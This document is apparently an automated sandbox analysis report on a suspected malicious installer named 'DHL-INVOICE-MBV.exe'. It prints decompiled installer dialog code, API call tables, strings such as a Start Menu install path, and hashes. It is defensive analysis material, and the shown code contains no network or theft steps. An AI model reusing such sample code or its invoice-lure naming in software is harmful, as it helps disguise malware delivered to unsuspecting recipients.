					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236cc = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236cc);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E004062A6(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004041FB(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004041FB(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x4236e0 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x4236e0 + _t316 * 4) = _t276;
									_t284 =  *( *0x4236e0 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a24c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404230(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404230(_v12);
								L91:
								return E00404262(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404c77
0x00404c88
0x00404c8d
0x00404c95
0x00404c9b
0x00404ca3
0x00404cb1
0x00404cb4
0x00404ed5
0x00404edc
0x00404ef0
0x00404ede
0x00404ee0
0x00404ee3
0x00404ee4
0x00404eeb
0x00404eeb
0x00404efc
0x00404f0a
0x00404f0d
0x00404f23
0x00404f98
0x00404f9b
0x00404f9d
0x00404fa7
0x00404fb5
0x00404fb5
0x00404fb7
0x00404fc1
0x00404fc7
0x00404fca
0x00404fcd
0x00404fe8
0x00404fcf
0x00404fd9
0x00404fd9
0x00404fcd
0x00404fc1
0x00000000
0x00404f9b
0x00404f28
0x00404f33
0x00404f38
0x00404f3f
0x00404f44
0x00404f48
0x00404f53
0x00404f53
0x00404f57
0x00404f5b
0x00404f5f
0x00404f72
0x00404f61
0x00404f61
0x00404f68
0x00404f6e
0x00404f6a
0x00404f6a
0x00404f6a
0x00404f68
0x00404f76
0x00404f78
0x00404f8b
0x00404f8e
0x00404f91
0x00404f91
0x00404f5b
0x00000000
0x00404f48
0x00404f2a
0x00404f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404feb
0x00404feb
0x00404ff2
0x00405063
0x0040506b
0x00405073
0x00405073
0x0040507c
0x0040507e
0x00405085
0x00405088
0x00405088
0x0040508e
0x00405095
0x00405098
0x00405098
0x0040509e
0x004050a4
0x004050aa
0x004050aa
0x004050b7
0x0040520d
0x00405214
0x00405231
0x00405237
0x00405249
0x00405249
0x00000000
0x004050bd
0x004050bf
0x004050c4
0x004050c9
0x004050ce
0x004050d0
0x004050d0
0x004050d1
0x004050d2
0x004050d4
0x004050d4
0x004050dc
0x0040511d
0x0040511f
0x0040512f
0x00405132
0x00405137
0x0040513e
0x00405141
0x004051e3
0x004051e9
0x004051f7
0x00405208
0x00405208
0x00000000
0x004051f7
0x00405147
0x0040514a
0x00405150
0x00405155
0x00405157
0x00405159
0x0040515f
0x00405166
0x0040516b
0x00405172
0x00405175
0x00405175
0x0040517c
0x00405188
0x0040518c
0x0040518e
0x0040518e
0x0040517e
0x00405180
0x00405180
0x004051ae
0x004051ba
0x004051c9
0x004051c9
0x004051cb
0x004051ce
0x004051d7
0x00000000
0x004050de
0x004050e9
0x004050ec
0x004050f1
0x004050f3
0x004050f7
0x00405107
0x00405111
0x00405113
0x00405116
0x00000000
0x00000000
0x00000000
0x00000000
0x004050f9
0x004050f9
0x004050ff
0x00405101
0x00405101
0x00405102
0x00405103
0x00000000
0x004050f9
0x004050dc
0x004050b7
0x00404ffa
0x00000000
0x00405010
0x0040501a
0x0040501f
0x00000000
0x00000000
0x00405031
0x00405036
0x00405042
0x00405042
0x00405044
0x00405053
0x00405055
0x00405059
0x0040505c
0x00000000
0x0040505c
0x00404ffa
0x00404cba
0x00404cbf
0x00404cc8
0x00404ccf
0x00404cdd
0x00404ce8
0x00404cee
0x00404cfc
0x00404d10
0x00404d15
0x00404d22
0x00404d27
0x00404d3d
0x00404d4e
0x00404d5b
0x00404d5b
0x00404d5e
0x00404d64
0x00404d66
0x00404d69
0x00404d6e
0x00404d73
0x00404d75
0x00404d75
0x00404d95
0x00404d95
0x00404d97
0x00404d98
0x00404d9d
0x00404da0
0x00404da3
0x00404da7
0x00404dac
0x00404db1
0x00404db5
0x00404dba
0x00404dbf
0x00404dc1
0x00404dc9
0x00404e94
0x00404ea7
0x00000000
0x00404dcf
0x00404dd2
0x00404dd5
0x00404dd8
0x00404dd8
0x00404ddf
0x00404de5
0x00404de8
0x00404dee
0x00404def
0x00404df4
0x00404dfd
0x00404e04
0x00404e07
0x00404e0a
0x00404e0d
0x00404e49
0x00404e72
0x00404e4b
0x00404e58
0x00404e58
0x00404e0f
0x00404e12
0x00404e21
0x00404e2b
0x00404e33
0x00404e3a
0x00404e42
0x00404e42
0x00404e0d
0x00404e78
0x00404e79
0x00404e85
0x00404e85
0x00404e92
0x00404ead
0x00404eb1
0x00404ece
0x00404ed3
0x00000000
0x00404eb3
0x00404eb8
0x00404ec1
0x0040524b
0x0040525d
0x0040525d
0x00404eb1
0x00000000
0x00404e92
0x00404dc9

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C80
GetDlgItem.USER32(?,00000408), ref: 00404C8B
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
LoadBitmapW.USER32(0000006E), ref: 00404CE8
SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
DeleteObject.GDI32(00000000), ref: 00404D5E
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
GetWindowLongW.USER32(?,000000F0), ref: 00404E99
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
ShowWindow.USER32(?,00000005), ref: 00404EB8
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
ImageList_Destroy.COMCTL32(?), ref: 00405088
GlobalFree.KERNEL32(?), ref: 00405098
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
ShowWindow.USER32(?,00000000), ref: 00405237
GetDlgItem.USER32(?,000003FE), ref: 00405242
ShowWindow.USER32(00000000), ref: 00405249

Strings

M, xrefs: 00404E12
N, xrefs: 00404EF3
, xrefs: 00405221

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004046EC Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004046EC(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x4226c0; // 0x6cb6b4
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004058CE(0x3fb, _t146);
					E00406518(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004058CE(0x3fb, _t146);
							if(E00405C61(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406284(0x4216b8, _t146);
							_t87 = E0040665E(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406284(0x4216b8, _t146);
								_t89 = E00405C04(0x4216b8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216b8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216b8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216b8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405BA5(0x4216b8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216b8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404B89(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t158) {
									E00404B71(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216a8);
									} else {
										E00404AA8(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2c4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E0040421D(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x4236d8 == _t158) {
									E00404645();
								}
								 *0x4236d8 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x4236e8;
							_v60 = E00404A42;
							_v56 = _t146;
							_v68 = E004062A6(_t146, 0x4236e8, _t167, 0x421ec0, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405B59(_t146);
								_t125 =  *((intOrPtr*)( *0x42a214 + 0x11c));
								if( *((intOrPtr*)( *0x42a214 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\unclinical") {
									E004062A6(_t146, 0x4236e8, _t167, 0, _t125);
									if(lstrcmpiW(0x4281a0, 0x4236e8) != 0) {
										lstrcatW(_t146, 0x4281a0);
									}
								}
								 *0x4236d8 =  *0x4236d8 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405BD0(_t146) != 0 && E00405C04(_t146) == 0) {
						E00405B59(_t146);
					}
					 *0x4291d8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004041FB(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004041FB(_t167);
					E00404230(_t166);
					_t138 = E0040665E(7);
					if(_t138 == 0) {
						L53:
						return E00404262(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x004046ec
0x004046f2
0x004046f8
0x00404705
0x00404713
0x00404716
0x0040471e
0x00404724
0x00404724
0x00404730
0x00404733
0x004047a1
0x004047a8
0x0040487f
0x00404886
0x00404895
0x00404895
0x00404899
0x004048a3
0x004048b0
0x004048b2
0x004048b2
0x004048c0
0x004048c7
0x004048ce
0x004048d1
0x0040490d
0x0040490f
0x00404915
0x0040491a
0x0040491e
0x00404920
0x00404920
0x0040493c
0x00000000
0x0040493e
0x00404941
0x0040494f
0x00404955
0x00404956
0x00404959
0x0040495c
0x00000000
0x0040495c
0x004048d3
0x004048d5
0x004048d9
0x00000000
0x00000000
0x00000000
0x00000000
0x004048db
0x004048db
0x004048e8
0x004048ed
0x00000000
0x00000000
0x004048f1
0x004048f3
0x004048f3
0x004048fc
0x004048fe
0x00404903
0x00404906
0x0040490b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040490b
0x00404968
0x00404972
0x00404975
0x00404978
0x0040497f
0x0040497f
0x00404981
0x00404981
0x00404986
0x00404988
0x00404990
0x00404997
0x00404999
0x004049a4
0x004049a4
0x00404999
0x004049b4
0x004049be
0x004049c6
0x004049e1
0x004049c8
0x004049d1
0x004049d1
0x004049c6
0x004049e6
0x004049eb
0x004049f0
0x004049f9
0x004049f9
0x00404a02
0x00404a04
0x00404a04
0x00404a10
0x00404a18
0x00404a22
0x00404a22
0x00404a27
0x00000000
0x00404a27
0x004048d1
0x00404888
0x0040488f
0x00000000
0x00000000
0x00000000
0x0040488f
0x004047ae
0x004047b7
0x004047d1
0x004047d6
0x004047e0
0x004047e7
0x004047f3
0x004047f6
0x004047f9
0x00404800
0x00404808
0x0040480b
0x0040480f
0x00404816
0x0040481e
0x00404878
0x00404820
0x00404821
0x00404828
0x00404832
0x0040483a
0x00404847
0x0040485b
0x0040485f
0x0040485f
0x0040485b
0x00404864
0x00404871
0x00404871
0x0040481e
0x00000000
0x004047d6
0x004047c4
0x00000000
0x00000000
0x004047ca
0x00000000
0x00404735
0x00404742
0x0040474b
0x00404758
0x00404758
0x0040475f
0x00404765
0x0040476e
0x00404771
0x00404774
0x0040477c
0x0040477f
0x00404782
0x00404788
0x0040478f
0x00404796
0x00404a2d
0x00404a3f
0x0040479c
0x0040479f
0x00000000
0x0040479f
0x00404796

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040473B
SetWindowTextW.USER32(00000000,?), ref: 00404765
SHBrowseForFolderW.SHELL32(?), ref: 00404816
CoTaskMemFree.OLE32(00000000), ref: 00404821
lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
lstrcatW.KERNEL32(?,Call), ref: 0040485F
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871

Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1

Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00403334,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00403334,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL-INVOICE-MBV.exe",00403334,C:\Users\user\AppData\Local\Temp\,75F73420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F

Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

6B, xrefs: 004047E9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical, xrefs: 0040483C
A, xrefs: 0040480F
Call, xrefs: 0040484D, 00404852, 0040485D

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unclinical$Call$6B
API String ID: 2624150263-1512452192
Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 74111B63 Relevance: 20.1, APIs: 13, Instructions: 576
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E74111B63() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t200;
				signed int _t203;
				void* _t205;
				void* _t207;
				WCHAR* _t209;
				void* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t219;
				struct HINSTANCE__* _t221;
				signed short _t223;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				void* _t229;
				intOrPtr* _t230;
				void* _t241;
				signed char _t242;
				signed int _t243;
				struct HINSTANCE__* _t249;
				void* _t250;
				signed int _t252;
				short* _t254;
				signed int _t260;
				signed int _t263;
				signed int _t265;
				void* _t268;
				void* _t272;
				struct HINSTANCE__* _t274;
				signed int _t277;
				void _t278;
				signed int _t279;
				signed int _t291;
				signed int _t292;
				void* _t294;
				signed int _t298;
				signed int _t301;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed short _t309;
				signed int _t310;
				WCHAR* _t311;
				WCHAR* _t313;
				WCHAR* _t314;
				struct HINSTANCE__* _t315;
				void* _t317;
				signed int _t319;
				void* _t320;

				_t274 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t320 = 0;
				_v48 = 0;
				_t200 = E7411121B();
				_v24 = _t200;
				_v28 = _t200;
				_v44 = E7411121B();
				_t310 = E74111243();
				_v52 = _t310;
				_v12 = _t310;
				while(1) {
					_t203 = _v32;
					_v56 = _t203;
					if(_t203 != _t274 && _t320 == _t274) {
						break;
					}
					_t309 =  *_t310;
					_t277 = _t309 & 0x0000ffff;
					_t205 = _t277 - _t274;
					if(_t205 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t207 = _v56 - _t274;
						if(_t207 == 0) {
							__eflags = _t320 - _t274;
							 *_v28 = _t274;
							if(_t320 == _t274) {
								_t320 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t320 + 0x1010) = _t274;
								 *(_t320 + 0x1014) = _t274;
							}
							_t278 = _v36;
							_t43 = _t320 + 8; // 0x8
							_t209 = _t43;
							_t44 = _t320 + 0x808; // 0x808
							_t311 = _t44;
							 *_t320 = _t278;
							_t279 = _t278 - _t274;
							__eflags = _t279;
							 *_t209 = _t274;
							 *_t311 = _t274;
							 *(_t320 + 0x1008) = _t274;
							 *(_t320 + 0x100c) = _t274;
							 *(_t320 + 4) = _t274;
							if(_t279 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t317 = 0;
								GlobalFree(_t320);
								_t320 = E74111311(_v24);
								__eflags = _t320 - _t274;
								if(_t320 == _t274) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t241 =  *(_t320 + 0x1ca0);
									__eflags = _t241 - _t274;
									if(_t241 == _t274) {
										break;
									}
									_t317 = _t320;
									_t320 = _t241;
									__eflags = _t320 - _t274;
									if(_t320 != _t274) {
										continue;
									}
									break;
								}
								__eflags = _t317 - _t274;
								if(_t317 != _t274) {
									 *(_t317 + 0x1ca0) = _t274;
								}
								_t242 =  *(_t320 + 0x1010);
								__eflags = _t242 & 0x00000008;
								if((_t242 & 0x00000008) == 0) {
									_t243 = _t242 | 0x00000002;
									__eflags = _t243;
									 *(_t320 + 0x1010) = _t243;
								} else {
									_t320 = E7411158F(_t320);
									 *(_t320 + 0x1010) =  *(_t320 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t291 = _t279 - 1;
								__eflags = _t291;
								if(_t291 == 0) {
									L28:
									lstrcpyW(_t209, _v44);
									L29:
									lstrcpyW(_t311, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L56:
									if(_v32 != 0xffffffff) {
										_t310 = _v12;
										continue;
									}
									break;
								}
								_t292 = _t291 - 1;
								__eflags = _t292;
								if(_t292 == 0) {
									goto L29;
								}
								__eflags = _t292 != 1;
								if(_t292 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t207 != 1) {
							goto L39;
						}
						_t249 = _v16;
						if(_v40 == _t274) {
							_t249 = _t249 - 1;
						}
						 *(_t320 + 0x1014) = _t249;
						goto L39;
					}
					_t250 = _t205 - 0x23;
					if(_t250 == 0) {
						__eflags = _t310 - _v52;
						if(_t310 <= _v52) {
							L15:
							_v32 = _t274;
							_v36 = _t274;
							goto L17;
						}
						__eflags =  *((short*)(_t310 - 2)) - 0x3a;
						if( *((short*)(_t310 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t274;
						if(_v32 == _t274) {
							L40:
							_t252 = _v32 - _t274;
							__eflags = _t252;
							if(_t252 == 0) {
								__eflags = _t277 - 0x2a;
								if(_t277 == 0x2a) {
									_v36 = 2;
									L54:
									_t310 = _v12;
									_v28 = _v24;
									_t274 = 0;
									__eflags = 0;
									L55:
									_t319 = _t310 + 2;
									__eflags = _t319;
									_v12 = _t319;
									goto L56;
								}
								__eflags = _t277 - 0x2d;
								if(_t277 == 0x2d) {
									L144:
									__eflags = _t309 - 0x2d;
									if(_t309 != 0x2d) {
										L147:
										_t254 = _t310 + 2;
										__eflags =  *_t254 - 0x3a;
										if( *_t254 != 0x3a) {
											L154:
											_v28 =  &(_v28[0]);
											 *_v28 = _t309;
											goto L55;
										}
										__eflags = _t309 - 0x2d;
										if(_t309 == 0x2d) {
											goto L154;
										}
										_v36 = 1;
										L150:
										_v12 = _t254;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t274;
										} else {
											 *_v28 = _t274;
											lstrcpyW(_v44, _v24);
										}
										goto L54;
									}
									_t254 = _t310 + 2;
									__eflags =  *_t254 - 0x3e;
									if( *_t254 != 0x3e) {
										goto L147;
									}
									_v36 = 3;
									goto L150;
								}
								__eflags = _t277 - 0x3a;
								if(_t277 != 0x3a) {
									goto L154;
								}
								goto L144;
							}
							_t260 = _t252 - 1;
							__eflags = _t260;
							if(_t260 == 0) {
								L77:
								_t294 = _t277 + 0xffffffde;
								__eflags = _t294 - 0x55;
								if(_t294 > 0x55) {
									goto L54;
								}
								switch( *((intOrPtr*)(( *(_t294 + 0x74112300) & 0x000000ff) * 4 +  &M74112274))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L129;
											}
											L128:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L133:
